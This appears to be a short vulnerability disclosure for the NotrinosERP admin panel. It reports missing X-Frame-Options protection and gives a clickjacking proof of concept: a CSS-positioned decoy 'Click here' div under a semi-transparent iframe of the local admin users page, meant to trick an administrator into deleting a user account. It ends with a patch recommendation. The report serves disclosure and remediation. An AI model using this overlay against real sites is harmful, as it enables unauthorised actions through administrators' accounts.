1. Hello team, on notrinoserp there is no clickjacking protection implemented x-frame-options, so an attacker can perform clickjacking attack, and in this case im able to delete user account via this vulnerability from the admin account, here is the POC:

Exploit Script:

<style>
    iframe {
        position:relative;
        width:1200px;
        height: 650px;
        opacity: 0.4;
        z-index: 2;
    }
    div {
        position:absolute;
        top:183px;
        left:880px;
        z-index: 1;
    }
</style>
<div>Click here</div>
&lt;iframe src="http://127.0.0.1:4445/admin/users.php?"&gt;&lt;/iframe&gt;

Patch Recommendation:

1. Add X-Frameheader to prevent clickjacking/UI Redressing attacks